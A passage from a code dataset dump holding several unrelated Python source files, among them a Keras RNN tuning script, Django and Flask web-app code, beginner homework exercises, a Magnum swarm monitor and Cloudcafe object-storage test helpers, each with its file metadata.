100\ntotal_acc\n\na1 = end - start\nminute = int(a1 / 60)\n\nprint(\"A RNN demorou {} segundos ou {} minuto(s) para treinar\".format(a1, minute))\n\n\n\n\n\n\n# Tunning the RNN\nfrom sklearn.model_selection import cross_val_score\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\ndef build_regressor(optimizer):\n regressor = Sequential()\n\n regressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 83))) # 83 inputs\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50, return_sequences = True))\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50, return_sequences = True))\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50)) # não retorna nenhum valor para o início da NN\n regressor.add(Dropout(0.2))\n\n regressor.add(Dense(units = 1)) # units = 1 | pois só queremos 1 output\n\n regressor.compile(optimizer = 'RMSprop', loss = 'mean_squared_error')\n return regressor\n# loss = 'mean_squared_error' | pois estamos fazendo uma regressão\n\n# Keras nos recomenda RMSprop como optimizer de RNNs, porém 'adam' tem melhor\n# performance neste modelo\nregressor = KerasClassifier(build_fn = build_regressor)\nparameters = {'batch_size': [12, 24, 36, 48, 60],\n 'epochs': [100, 250, 500, 750, 1000],\n 'optimizer': ['adam', 'rmsprop']}\n\ngrid_search = GridSearchCV(estimator = regressor,\n param_grid = parameters,\n scoring = 'neg_mean_squared_error',\n cv = 10)\n\ngrid_search = grid_search.fit(X_train, y_train)\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n\n\n# Fitting the RNN to the Training set\nstart = time.time()\nregressor.fit(X_train, y_train, epochs = 100, batch_size = 32)\nend = time.time()\nend - start\n\n","sub_path":"RNN/Recurrent_Neural_Networks/scripts/rnn_tunning/indicators_benchmarked.py","file_name":"indicators_benchmarked.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"56215668","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('habits/', views.user_profile, name='user-profile'),\n    path('habits/<int:pk>/', views.habit_detail, name='habit-detail'),\n]\n\n# views for creating and deleting habits\nurlpatterns += [\n    path('habits/new/', views.new_habit, name='new-habit'),\n    path('habits/<int:pk>/delete/',\n         views.HabitDelete.as_view(),\n         name='habit-delete'),\n]\n\n# views for creating, updating, and deleting dailyrecords\nurlpatterns += [\n    path('habits/<int:pk>/new/', views.new_daily_record, name='new-record'),\n    path('records/<int:pk>/update/',\n         views.DailyRecordUpdate.as_view(),\n         name='update-record'),\n    path('records/<int:pk>/delete/',\n         views.DailyRecordDelete.as_view(),\n         name='delete-record'),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"177568421","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log\n\nfrom magnum.common import docker_utils\nfrom magnum.conductor import monitors\n\nLOG = log.getLogger(__name__)\n\n\nclass SwarmMonitor(monitors.MonitorBase):\n\n    def __init__(self, context, cluster):\n        super(SwarmMonitor, self).__init__(context, cluster)\n        self.data = {}\n        self.data['nodes'] = []\n        self.data['containers'] = []\n\n    @property\n    def metrics_spec(self):\n        return {\n            'memory_util': {\n                'unit': '%',\n                'func': 'compute_memory_util',\n            },\n        }\n\n    def pull_data(self):\n        with docker_utils.docker_for_cluster(self.context,\n                                             self.cluster) as docker:\n            system_info = docker.info()\n            self.data['nodes'] = self._parse_node_info(system_info)\n\n            # pull data from each container\n            containers = []\n            for container in docker.containers(all=True):\n                try:\n                    container = docker.inspect_container(container['Id'])\n                except Exception as e:\n                    LOG.warning(\"Ignore error [%(e)s] when inspecting \"\n                                \"container %(container_id)s.\",\n                                {'e': e, 'container_id': container['Id']},\n                                exc_info=True)\n                containers.append(container)\n            self.data['containers'] = containers\n\n    def compute_memory_util(self):\n        mem_total = 0\n        for node in self.data['nodes']:\n            mem_total += node['MemTotal']\n        mem_reserved = 0\n        for container in self.data['containers']:\n            mem_reserved += container['HostConfig']['Memory']\n\n        if mem_total == 0:\n            return 0\n        else:\n            return mem_reserved * 100 / mem_total\n\n    def _parse_node_info(self, system_info):\n        \"\"\"Parse system_info to retrieve memory size of each node.\n\n        :param system_info: The output returned by docker.info().
Example:\n {\n u'Debug': False,\n u'NEventsListener': 0,\n u'DriverStatus': [\n [u'\\x08Strategy', u'spread'],\n [u'\\x08Filters', u'...'],\n [u'\\x08Nodes', u'2'],\n [u'node1', u'10.0.0.4:2375'],\n [u' \\u2514 Containers', u'1'],\n [u' \\u2514 Reserved CPUs', u'0 / 1'],\n [u' \\u2514 Reserved Memory', u'0 B / 2.052 GiB'],\n [u'node2', u'10.0.0.3:2375'],\n [u' \\u2514 Containers', u'2'],\n [u' \\u2514 Reserved CPUs', u'0 / 1'],\n [u' \\u2514 Reserved Memory', u'0 B / 2.052 GiB']\n ],\n u'Containers': 3\n }\n :return: Memory size of each node. Excample:\n [{'MemTotal': 2203318222.848},\n {'MemTotal': 2203318222.848}]\n \"\"\"\n nodes = []\n for info in system_info['DriverStatus']:\n key = info[0]\n value = info[1]\n if key == u' \\u2514 Reserved Memory':\n memory = value # Example: '0 B / 2.052 GiB'\n memory = memory.split('/')[1].strip() # Example: '2.052 GiB'\n memory = memory.split(' ')[0] # Example: '2.052'\n memory = float(memory) * 1024 * 1024 * 1024\n nodes.append({'MemTotal': memory})\n return nodes\n","sub_path":"magnum/drivers/swarm_fedora_atomic_v2/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"345878774","text":"import os\nfrom flask import Flask, app, render_template, redirect, url_for, request, abort\nfrom functools import wraps\nimport requests\nfrom flask_login import LoginManager, login_required, login_user, current_user\nfrom oauthlib.oauth2 import WebApplicationClient\n\nfrom todo_app.data.mongodb import MongoDB\nfrom todo_app.user import User\nfrom todo_app.view_model import ViewModel\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = os.getenv('SECRET_KEY')\n app.config['LOGIN_DISABLED'] = os.getenv('LOGIN_DISABLED')\n database = MongoDB()\n\n ## Auth Service Setup\n login_manager = LoginManager()\n login_manager.init_app(app)\n\n client_id = os.getenv(\"AUTH_CLIENT_ID\")\n client_secret = os.getenv(\"AUTH_CLIENT_SECRET\")\n authorization_base_url = 'https://github.com/login/oauth/authorize'\n token_url = 'https://github.com/login/oauth/access_token'\n\n auth_client = WebApplicationClient(client_id)\n auth_client.prepare_request_uri(authorization_base_url)\n\n @login_manager.unauthorized_handler\n def unauthenticated():\n return redirect(auth_client.prepare_request_uri(authorization_base_url))\n\n @login_manager.user_loader\n def load_user(user_id):\n return User(user_id)\n\n @app.route('/login/')\n def login():\n code = request.args.get('code')\n token_request_url, token_request_headers, token_request_body = auth_client.prepare_token_request(token_url, authorization_response=request.url, client_secret=client_secret)\n token_request_response = requests.post(token_request_url, headers=token_request_headers, data=token_request_body)\n auth_client.parse_request_body_response(token_request_response.content.decode())\n user_request_url, user_request_headers, user_request_body = auth_client.add_token(\"https://api.github.com/user\")\n user_request_response = requests.get(user_request_url, headers=user_request_headers, data=user_request_body)\n user_name = user_request_response.json()['login']\n user = User(user_name)\n login_user(user)\n return redirect(url_for('index'))\n\n def writer_required(f):\n @login_required\n @wraps(f)\n def decorated_function(*args, **kwargs):\n user = User(current_user.id)\n if not user.is_writer() and not app.config.get('LOGIN_DISABLED'):\n abort(401, \"Permission Denied\")\n return 
f(*args, **kwargs)\n        return decorated_function\n\n    @app.route('/')\n    @login_required\n    def index():\n        user = User(current_user.id)\n        items = database.get_items()\n        view_model_items = ViewModel(items)\n        return render_template('index.html', items = view_model_items, read_only = not user.is_writer())\n\n\n    @app.route('/items/new', methods=['POST'])\n    @writer_required\n    def add_item():\n        name = request.form['name']\n        database.add_item(name)\n        return redirect(url_for('index'))\n\n\n    @app.route('/items/<int:id>/start')\n    @writer_required\n    def start_item(id):\n        database.start_item(id)\n        return redirect(url_for('index'))\n\n\n    @app.route('/items/<int:id>/complete')\n    @writer_required\n    def complete_item(id):\n        database.complete_item(id)\n        return redirect(url_for('index'))\n\n\n    @app.route('/items/<int:id>/uncomplete')\n    @writer_required\n    def uncomplete_item(id):\n        database.uncomplete_item(id)\n        return redirect(url_for('index'))\n\n\n    @app.route('/items/<int:id>/delete')\n    @writer_required\n    def delete_item(id):\n        database.delete_item(id)\n        return redirect(url_for('index'))\n\n\n    if __name__ == '__main__':\n        app.run(host='0.0.0.0')\n\n    return app\n","sub_path":"todo_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"91290830","text":"from random import randint\nimport math\n\n# 1) Write a function that emulates the game \"rock, scissors, paper\"\n# At the entrance, your function accepts your version printed from the console, the computer makes a decision randomly.\n\n\ndef game_rsp(player):\n    choice = {1: 'ROCK',\n              2: 'SCISSORS',\n              3: 'PAPER'\n              }\n    computer = randint(1, 3)\n    win = ''\n    if computer == player:\n        win = 'DRAW'\n    if player == 1 and computer == 2:\n        win = 'player'\n    if player == 1 and computer == 3:\n        win = 'computer'\n    if player == 2 and computer == 1:\n        win = 'computer'\n    if player == 2 and computer == 3:\n        win = 'player'\n    if player == 3 and computer == 1:\n        win = 'player'\n    if player == 3 and computer == 2:\n        win = 'computer'\n    print(f'player entered {choice.get(player)}\\ncomputer choice {choice.get(computer)}\\nwin {win}')\n\n\nplayer_ = int(input('Entered 1 = ROCK 2 = SCISSORS 3 = PAPER: '))\ngame_rsp(player_)\n\n# 2) Try to imagine a world in which you might have to stay home for (Corona virus) 14 days at any given time.\n# Do you have enough toilet paper (TP) to make it through?\n# Although the number of squares per roll of TP varies significantly, we'll assume each roll has 500 sheets,\n# and the average person uses 57 sheets per day.\n\n# Create a function that will receive a dictionary with two key/values:\n# \"people\" — Number of people in the household.\n# \"tp\" — Number of rolls.\n# Return a statement telling the user if they need to buy more TP!\n\n\ndef count_rolls(people=1, tp=0):\n    need_rolls = math.ceil(people*57*14/500)\n    if need_rolls <= tp:\n        print('You have enough toilet paper')\n    else:\n        to_buy = need_rolls - tp\n        print(f'You need to buy {to_buy} rolls')\n\n\ndictionary = {\n    \"people\": 3,\n    \"tp\": 1\n}\n\n\ndef count_rolls1(dict_):\n    need_rolls = math.ceil(dict_.get('people')*57*14/500)\n    if need_rolls <= dict_.get('tp'):\n        print('You have enough toilet paper')\n    else:\n        to_buy = need_rolls - dict_.get('tp')\n        print(f'You need to buy {to_buy} rolls')\n\n\ncount_rolls(3, 1)\ncount_rolls1(dictionary)\n\n\n# 3) Make a function that encrypts a given input with these steps:\n# Input: \"apple\"\n# Step 1: Reverse the input: \"elppa\"\n# Step 2: Replace all vowels
using the following chart:\n# a => 0\n# e => 1\n# i => 2\n# o => 2\n# u => 3\n# # \"1lpp0\"\n# Example:\n# encrypt(\"banana\") ➞ \"0n0n0baca\"\n# encrypt(\"karaca\") ➞ \"0c0r0kaca\"\n# encrypt(\"burak\") ➞ \"k0r3baca\"\n# encrypt(\"alpaca\") ➞ \"0c0pl0aca\"\n\n\ndef encrypt(line):\n charts = {\n 'a': 0,\n 'e': 1,\n 'i': 2,\n 'o': 2,\n 'u': 3\n }\n line = line[::-1]\n result = ''\n for ch in line:\n if ch in charts.keys():\n result += str(charts[ch])\n else:\n result += ch\n return result\n\n\nprint(encrypt(input('Entered line: ')))\n\n\n# **4)Given a 3x3 matrix of a completed tic-tac-toe game, create a function that returns whether the game is a win\n# for \"X\", \"O\", or a \"Draw\", where \"X\" and \"O\" represent themselves on the matrix, and \"E\" represents an empty spot.\n# Example:\n\ntic_tac_toe = ([\n [\"X\", \"O\", \"X\"],\n [\"O\", \"X\", \"O\"],\n [\"O\", \"X\", \"X\"]]) #➞ \"X\"\n#\ntic_tac_toe1 =([\n [\"O\", \"O\", \"O\"],\n [\"O\", \"X\", \"X\"],\n [\"E\", \"X\", \"X\"]\n ]) #➞ \"O\"\n#\n\ntic_tac_toe2 = ([\n [\"X\", \"X\", \"0\"],\n [\"0\", \"O\", \"X\"],\n [\"X\", \"X\", \"O\"]])\n# ➞ \"Draw\"\n\n\ndef is_win(array):\n\n def horizontal():\n for i in range(len(array)):\n w = array[i][0]\n win = 'Draw'\n for j in range(len(array)):\n\n if array[i][j] == w and array[i][j] != 'E':\n win = array[i][0]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n def vertical():\n for i in range(len(array)):\n w = array[i][0]\n win = 'Draw'\n for j in range(len(array)):\n\n if array[j][i] == w and array[j][i] != 'E':\n\n win = array[j][i]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n def diagonal():\n win = 'Draw'\n for x in range(len(array)):\n w = array[0][0]\n if array[x][x] == w and array[x][x] != 'E':\n win = array[x][x]\n continue\n else:\n win = 'Draw'\n break\n\n if win == 'Draw':\n for i in range(len(array)):\n y = len(array) - 1 - i\n w = array[i][len(array) - 1]\n if array[i][y] == w and array[i][y] != 'E':\n win = array[i][y]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n if horizontal() != 'Draw':\n winner = horizontal()\n elif vertical() != 'Draw':\n winner = vertical()\n elif diagonal() != 'Draw':\n winner = diagonal()\n else:\n winner = 'draw'\n\n print(winner)\n\n\nis_win(tic_tac_toe)\nis_win(tic_tac_toe1)\nis_win(tic_tac_toe2)","sub_path":"home_work_4.py","file_name":"home_work_4.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"82141152","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom djauth.decorators import portal_auth_required\nfrom djmapache.commonapp.forms import UploadForm\n\n\ndef handle_uploaded_file(phile):\n \"\"\"Save uploaded file to the file system.\"\"\"\n sendero = '{0}{1}'.format(settings.COMMONAPP_CSV_OUTPUT, phile.name)\n with open(sendero, 'wb+') as destination:\n for chunk in phile.chunks():\n destination.write(chunk)\n\n\n@portal_auth_required(\n session_var='DJMAPACHE_AUTH',\n redirect_url=reverse_lazy('access_denied')\n)\ndef upload(request):\n \"\"\"Upload commonapp data file.\"\"\"\n if request.method == 'POST':\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n handle_uploaded_file(request.FILES['phile'])\n return HttpResponseRedirect(reverse_lazy('upload_success'))\n else:\n form = UploadForm()\n\n response = render(request, 
'commonapp/upload.html', {'form': form})\n return response\n","sub_path":"djmapache/commonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535275235","text":"from django.db import models\r\nfrom threads.models import Thread\r\nfrom django.conf import settings\r\nfrom mptt.models import MPTTModel, TreeForeignKey\r\nimport uuid as uuid_lib\r\n# from shortuuidfield import ShortUUIDField\r\nimport shortuuid\r\n\r\nUser = settings.AUTH_USER_MODEL\r\n\r\n\r\nclass CommentManager(models.Manager):\r\n def all(self):\r\n qs = super(CommentManager, self).filter(parent=None)\r\n return qs\r\n\r\n\r\nclass Comment(MPTTModel):\r\n\r\n uuid = models.UUIDField(db_index=True,\r\n default=uuid_lib.uuid4,\r\n editable=False)\r\n body = models.CharField(max_length=280)\r\n comment_on = models.ForeignKey(Thread, on_delete=models.CASCADE, null=True, related_name='comments')\r\n parent = TreeForeignKey('self', null=True, blank=True, related_name='replies', db_index=True, on_delete=models.CASCADE)\r\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\r\n created_on = models.DateTimeField(auto_now_add=True, editable=False)\r\n\r\n # url = ShortUUIDField(db_index=True, default=uuid_lib.uuid4, editable=False, unique=True)\r\n\r\n objects = CommentManager()\r\n\r\n class MPTTMeta:\r\n order_insertion_by = ['created_on']\r\n\r\n def __str__(self):\r\n return str(f'{self.user}: {self.body[:50]}...')\r\n\r\n def children(self):\r\n return Comment.objects.filter(parent=self)\r\n\r\n @property\r\n def is_parent(self):\r\n if self.parent is not None:\r\n return False\r\n return True\r\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"1621945","text":"# -*- coding: utf-8 -*-\n\n\"\"\"An extension to Flask-SQLAlchemy.\"\"\"\n\nimport datetime\nimport logging\nfrom typing import Dict, Iterable, Optional\n\nfrom flask import Flask, g, render_template\nfrom flask_admin import Admin\nfrom flask_security import SQLAlchemyUserDatastore\nfrom raven.contrib.flask import Sentry\n\nfrom pybel import BELGraph, Manager\nfrom pybel.examples import braf_graph, egf_graph, homology_graph, sialic_acid_graph, statin_graph\nfrom pybel.manager.models import Author, Citation, Edge, Evidence, Namespace, NamespaceEntry, Network, Node\nfrom pybel.struct.mutation import expand_node_neighborhood, expand_nodes_neighborhoods, infer_child_relations\nfrom pybel.struct.pipeline import in_place_transformation, uni_in_place_transformation\nfrom .admin_model_views import (\n CitationView, EdgeView, EvidenceView, ExperimentView, ModelView, NamespaceView, NetworkView, NodeView, QueryView,\n ReportView, UserView, build_project_view,\n)\nfrom .constants import SENTRY_DSN\nfrom .manager_utils import insert_graph\nfrom .models import Assembly, EdgeComment, EdgeVote, Experiment, NetworkOverlap, Query, Report, Role, User, UserQuery\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n\ndef register_transformations(manager: Manager) -> None: # noqa: D202\n \"\"\"Register several manager-based PyBEL transformation functions.\"\"\"\n\n @uni_in_place_transformation\n def expand_nodes_neighborhoods_by_ids(universe: BELGraph, graph: BELGraph, node_hashes: Iterable[str]) -> None:\n \"\"\"Expand around 
the neighborhoods of a list of nodes by identifier.\"\"\"\n nodes = [\n manager.get_dsl_by_hash(node_hash)\n for node_hash in node_hashes\n ]\n return expand_nodes_neighborhoods(universe, graph, nodes)\n\n @uni_in_place_transformation\n def expand_node_neighborhood_by_id(universe: BELGraph, graph: BELGraph, node_hash: str) -> None:\n \"\"\"Expand around the neighborhoods of a node by identifier.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n return expand_node_neighborhood(universe, graph, node)\n\n @in_place_transformation\n def delete_nodes_by_ids(graph: BELGraph, node_hashes: Iterable[str]) -> None:\n \"\"\"Remove a list of nodes by identifier.\"\"\"\n nodes = [\n manager.get_dsl_by_hash(node_hash)\n for node_hash in node_hashes\n ]\n graph.remove_nodes_from(nodes)\n\n @in_place_transformation\n def delete_node_by_id(graph: BELGraph, node_hash: str) -> None:\n \"\"\"Remove a node by its SHA512.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n graph.remove_node(node)\n\n @in_place_transformation\n def propagate_node_by_hash(graph: BELGraph, node_hash: str) -> None:\n \"\"\"Infer relationships from a node by its SHA512.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n infer_child_relations(graph, node)\n\n\ndef register_users_from_manifest(user_datastore: SQLAlchemyUserDatastore, manifest: Dict) -> None:\n \"\"\"Register the users and roles in a manifest.\n\n :param user_datastore: A user data store\n :param dict manifest: A manifest dictionary, which contains two keys: ``roles`` and ``users``. The ``roles``\n key corresponds to a list of dictionaries containing ``name`` and ``description`` entries. The ``users`` key\n corresponds to a list of dictionaries containing ``email``, ``password``, and ``name`` entries\n as well as a optional ``roles`` entry with a corresponding list relational to the names in the ``roles``\n entry in the manifest.\n \"\"\"\n for role in manifest['roles']:\n user_datastore.find_or_create_role(**role)\n\n for user_manifest in manifest['users']:\n email = user_manifest['email']\n user = user_datastore.find_user(email=email)\n if user is None:\n logger.info(f'creating user: {email}')\n user = user_datastore.create_user(\n confirmed_at=datetime.datetime.now(),\n email=email,\n password=user_manifest['password'],\n name=user_manifest['name'],\n )\n\n for role_name in user_manifest.get('roles', []):\n if user_datastore.add_role_to_user(user, role_name):\n logger.info(f'registered {user} as {role_name}')\n\n user_datastore.commit()\n\n\ndef register_error_handlers(app: Flask, *, sentry: Optional[Sentry] = None) -> None: # noqa: D202\n \"\"\"Register the 500 and 403 error handlers.\"\"\"\n\n @app.errorhandler(500)\n def internal_server_error(_):\n \"\"\"Call this filter when there's an internal server error.\n\n Run a rollback and send some information to Sentry.\n \"\"\"\n if sentry is not None and SENTRY_DSN in app.config:\n kwargs = dict(\n event_id=g.sentry_event_id,\n public_dsn=sentry.client.get_public_dsn('https'),\n )\n else:\n kwargs = {}\n\n return render_template('errors/500.html', **kwargs)\n\n @app.errorhandler(403)\n def forbidden_error(error):\n \"\"\"You must not cross this error.\"\"\"\n return render_template('errors/403.html')\n\n\ndef register_examples(manager: Manager, user_datastore: SQLAlchemyUserDatastore, butler: User) -> None:\n \"\"\"Insert example graphs.\"\"\"\n for graph in (sialic_acid_graph, egf_graph, statin_graph, homology_graph):\n if not manager.has_name_version(graph.name, graph.version):\n logger.info('uploading public 
example graph: %s', graph)\n insert_graph(manager, graph, user=butler, public=True)\n\n test_user = user_datastore.find_user(email='test@example.com')\n if test_user:\n for graph in (braf_graph,):\n if not manager.has_name_version(graph.name, graph.version):\n logger.info('uploading internal example graph: %s', graph)\n insert_graph(manager, graph, user=test_user, public=False)\n\n\ndef register_admin_service(app: Flask, manager: Manager) -> Admin:\n \"\"\"Add a Flask-Admin database front-end.\"\"\"\n admin = Admin(app, template_mode='bootstrap3')\n\n admin.add_view(UserView(User, manager.session))\n admin.add_view(ModelView(Role, manager.session))\n admin.add_view(NamespaceView(Namespace, manager.session, category='Terminology'))\n admin.add_view(ModelView(NamespaceEntry, manager.session, category='Terminology'))\n admin.add_view(NetworkView(Network, manager.session, category='Network'))\n admin.add_view(NodeView(Node, manager.session))\n admin.add_view(EdgeView(Edge, manager.session, category='Edge'))\n admin.add_view(CitationView(Citation, manager.session, category='Provenance'))\n admin.add_view(EvidenceView(Evidence, manager.session, category='Provenance'))\n admin.add_view(ModelView(Author, manager.session, category='Provenance'))\n admin.add_view(ReportView(Report, manager.session, category='Network'))\n admin.add_view(ExperimentView(Experiment, manager.session))\n admin.add_view(QueryView(Query, manager.session, category='Query'))\n admin.add_view(ModelView(UserQuery, manager.session, category='Query'))\n admin.add_view(ModelView(Assembly, manager.session))\n admin.add_view(ModelView(EdgeVote, manager.session, category='Edge'))\n admin.add_view(ModelView(EdgeComment, manager.session, category='Edge'))\n admin.add_view(ModelView(NetworkOverlap, manager.session, category='Network'))\n admin.add_view(build_project_view(manager=manager))\n\n return admin\n","sub_path":"src/bel_commons/application_utils.py","file_name":"application_utils.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"56443838","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom copy import deepcopy\nimport uuid\nimport json\n\nfrom cafe.engine.behaviors import BaseBehavior, behavior\nfrom cloudcafe.objectstorage.objectstorage_api.config \\\n import ObjectStorageAPIConfig\nfrom cloudcafe.objectstorage.objectstorage_api.client \\\n import ObjectStorageAPIClient\n\n\nclass ObjectStorageAPI_Behaviors(BaseBehavior):\n HEADERS_AUTH_TOKEN = 'X-Auth-Token'\n\n PATH_TYPES_ACCOUNT = 'account'\n PATH_TYPES_CONTAINER = 'container'\n PATH_TYPES_OBJECT = 'object'\n\n ERROR_INVALID_PATH = 'path must be supplied as a string.'\n ERROR_INVALID_METHOD = 'method must be supplied as a string.'\n\n VALID_OBJECT_NAME = 'object'\n VALID_OBJECT_NAME_WITH_SLASH = 'object/foo'\n VALID_OBJECT_NAME_WITH_TRAILING_SLASH = 'object/'\n VALID_OBJECT_NAME_WITH_UNICODE = 'objectfoo'\n VALID_OBJECT_DATA = 'object data.'\n\n 
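    # The VALID_* names in this class are shared test fixtures. A minimal, hypothetical usage sketch (the 'client' variable is assumed, not defined in this module):\n    #\n    #     behaviors = ObjectStorageAPI_Behaviors(client=client)\n    #     name = behaviors.generate_unique_container_name('smoke')\n    #     behaviors.create_container(name)\n    #     behaviors.create_object(name, behaviors.VALID_OBJECT_NAME,\n    #                             data=behaviors.VALID_OBJECT_DATA)\n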
VALID_TEMPURL_KEY = 'qe-tempurl-key'\n\n def __init__(self, client=None, config=None):\n self.client = client\n if config:\n self.config = config\n else:\n self.config = ObjectStorageAPIConfig()\n\n def generate_unique_container_name(self, identifier=None):\n if identifier:\n identifier = '{0}_'.format(identifier)\n\n randomstring = str(uuid.uuid4()).replace('-', '')\n\n container_name = '{0}_{1}{2}'.format(\n self.config.base_container_name, identifier,\n randomstring)\n\n return container_name\n\n @behavior(ObjectStorageAPIClient)\n def get_swift_info(self):\n \"\"\"\n Returns a dictionary of info requested from swift.\n \"\"\"\n response = self.client.get_swift_info()\n if not response.ok:\n raise Exception('Could not load info from swift.')\n\n return json.loads(response.content)\n\n def get_swift_features(self):\n \"\"\"\n Returns a string represnting the enabled features seperated by commas.\n \"\"\"\n info = self.get_swift_info()\n features = ' '.join([k for k in info.viewkeys()])\n return features\n\n @behavior(ObjectStorageAPIClient)\n def container_exists(self, name=None):\n path = '/{0}'.format(name)\n response = self.request('HEAD', path)\n\n if response.status_code == 404:\n return False\n\n if not response.ok:\n raise Exception(\n 'Error checking the existance of container \"{0}\"'.format(\n str(name)))\n\n return True\n\n @behavior(ObjectStorageAPIClient)\n def create_container(self, container_name, log_delivery=False, headers={}):\n\n if log_delivery:\n headers['X-Container-Meta-Access-Log-Delivery'] = str(True)\n\n response = self.client.create_container(\n container_name,\n headers=headers)\n\n if not response.ok:\n raise Exception(\n 'could not create container \"{0}\"'.format(str(container_name)))\n\n @behavior(ObjectStorageAPIClient)\n def create_object(self, container_name, object_name, data=None,\n headers={}, params={}):\n if not self.container_exists(container_name):\n self.create_container(container_name)\n\n if data and 'content-length' not in headers:\n headers['content-length'] = str(len(data))\n\n response = self.client.create_object(\n container_name,\n object_name,\n data=data,\n headers=headers,\n params=params)\n\n if not response.ok:\n raise Exception('could not create object \"{0}/{1}\"'.format(\n container_name, object_name))\n\n @behavior(ObjectStorageAPIClient)\n def request(self, method=None, path='', **kwargs):\n \"\"\"\n Make a HTTP request against the client's acccount. This request\n should make no assumptions and do no setup for you. It shuold be\n considered a dumb request that does exactly what you tell it.\n\n @type method: string\n @param method: the value to use as the HTTP method.\n @type path: string\n @param path: the value representing the path to the container/object\n you would like to make the request against. 
If you want to\n make a request against the account, the path field can be omitted.\n\n @rtype: object(requests.Response)\n @return: a Requests Libray response object.\n \"\"\"\n if type(path) is not str:\n raise TypeError(self.ERROR_INVALID_METHOD)\n\n url = '{0}{1}'.format(self.client.storage_url, path)\n response = self.client.request(\n method, url, requestslib_kwargs=kwargs)\n\n return response\n\n @behavior(ObjectStorageAPIClient)\n def authed_request(self, method=None, path='', **kwargs):\n \"\"\"\n Same as request, except the auth token is automatically added to\n the headers for the request.\n\n @type method: string\n @param method: the value to use as the HTTP method.\n @type path: string\n @param path: the value representing the path to the container/object\n you would like to make the request against. If you want to\n make a request against the account, the path field can be omitted.\n\n @rtype: object(requests.Response)\n @return: a Requests Libray response object.\n \"\"\"\n new_args = [method, path]\n new_kwargs = deepcopy(kwargs)\n\n if 'headers' not in new_kwargs:\n new_kwargs['headers'] = \\\n {self.HEADERS_AUTH_TOKEN: self.client.auth_token}\n else:\n auth_provided = bool(\n [x for x in new_kwargs['headers'] if\n x.lower() == self.HEADERS_AUTH_TOKEN.lower()])\n if not auth_provided:\n new_kwargs['headers'][self.HEADERS_AUTH_TOKEN] = \\\n self.auth_token\n\n response = self.request(*new_args, **new_kwargs)\n\n return response\n\n @behavior(ObjectStorageAPIClient)\n def get_tempurl_key(self):\n \"\"\"\n Returns the TempURL key for the account\n \"\"\"\n response = self.authed_request(method='HEAD')\n if 'x-account-meta-temp-url-key' not in response.headers:\n return None\n\n return response.headers['x-account-meta-temp-url-key']\n","sub_path":"cloudcafe/objectstorage/objectstorage_api/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"639896866","text":"from multi_key_dict import multi_key_dict\r\nfrom math import *\r\nfrom seqlencalc import getseqlen\r\nfrom seqlencalc import baseset\r\nfrom jiliplot import Node\r\nimport datetime\r\n\r\nclass ThreeDVector:\r\n\tdef __init__(self, x, y, z):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.z = z\r\n\t\t\r\n\tdef 